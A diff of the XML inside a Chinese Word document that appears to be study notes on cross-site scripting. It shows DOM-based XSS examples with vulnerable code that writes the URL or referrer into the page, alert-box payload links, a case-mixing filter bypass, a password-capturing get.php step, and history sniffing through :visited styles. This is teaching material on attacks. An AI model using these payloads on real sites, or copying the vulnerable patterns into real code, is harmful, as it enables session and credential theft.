--- a/TransportLayer/XSS.docx
+++ b/TransportLayer/XSS.docx
@@ -1,10 +1,11 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14 w15 wp14">
+  <w:background w:color="FFFFFF"/>
   <w:body>
     <w:p>
       <w:pPr>
-        <w:ind w:left="2100" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:ind w:left="2940" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
         <w:rPr>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -662,6 +663,15 @@
         </w:rPr>
         <w:t>document.referer属性</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(上一个页面单击到这个页面的url)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -702,6 +712,15 @@
         </w:rPr>
         <w:t>location属性</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="C00000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(当前页面的url)</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -756,6 +775,512 @@
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>客户端源代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>var a=document.URL;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>document.write(a.substring(a.indexOf(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>“a=”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)+2,a.length));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>恶意链接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.bug.com/index.asp?a=&lt;script&gt;alert(‘xss’)&lt;/script&gt;" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>http://www.bug.com/index.asp?a=&lt;script&gt;alert(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>‘xss’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)&lt;/script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>客户端源码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;a href=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>”http://www.bug.com”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&gt;bug&lt;/a&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>document.write(document.referrer);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>恶意链接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.bug.com/index.asp?#&lt;script&gt;alert(‘xss’);&lt;/script&gt;" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>http://www.bug.com/index.asp#&lt;script&gt;alert(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>‘xss’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="8"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>);&lt;/script&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>客户端源码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>document.wirte(document.location.href);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>恶意代码</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>http://www.bug.com/index.asp#&lt;script&gt;alert(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>‘xss’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1532,7 +2057,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>&lt;A HREF=”javaScRipt:alert(0);”&gt;aa&lt;/A&gt; 大小写混淆</w:t>
+        <w:t>&lt;A HREF=”javaScRipt:alert(0);”&gt;aa&lt;/A&gt;大小写混淆</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3312,9 +3837,12 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>(3)</w:t>
-      </w:r>
-      <w:r>
+        <w:t>(3)get.php获取用户名与密码，并重定向到正确的页面</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
         <w:rPr>
           <w:rFonts w:hint="default"/>
           <w:color w:val="auto"/>
@@ -3322,24 +3850,24 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>get.php</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="auto"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>获取用户名与密码，并重定向到正确的页面</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="auto"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
@@ -3354,175 +3882,171 @@
           <w:color w:val="auto"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>六．xss history hacking</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>利用链接样式与getComputedStyle()技术。来获取用户访问过的链接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>a:link{color:#FF0000}    //未访问的链接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>a:hover{color:#FF00FF}  //光标悬停在链接上</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>a:active{color:#0000FF}  //被选择的链接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>a:visited{color:#00FF00}  //已访问的链接</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>getComputedStyle是一个可以获取当前元素所有最终使用的CSS属性值。返回的是一个CSS样式声明对象([object CSSStyleDeclaration])。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="420" w:firstLineChars="0"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>六．xss history hacking</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>利用链接样式与getComputedStyle()技术。来获取用户访问过的链接</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>a:link{color:#FF0000}    //未访问的链接</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>a:hover{color:#FF00FF}  //光标悬停在链接上</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>a:active{color:#0000FF}  //被选择的链接</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>a:visited{color:#00FF00}  //已访问的链接</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>getComputedStyle是一个可以获取当前元素所有最终使用的CSS属性值。返回的是一个CSS样式声明对象([object CSSStyleDeclaration])。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:t>getComputedStyle("元素", "伪类");第二个参数“伪类”（如果不是伪类，设置为null）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3531,18 +4055,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>getComputedStyle("元素", "伪类");第二个参数“伪类”（如果不是伪类，设置为null）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>getPropertyValue方法可以获取CSS样式</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>声</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -3550,39 +4073,1237 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>getPropertyValue方法可以获取CSS样式</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>声</w:t>
-      </w:r>
-      <w:r>
+        <w:t>明对象([object CSSStyleDeclaration])上的属性值</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ;    getProopertyValue(‘属性值’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="420" w:firstLineChars="0"/>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
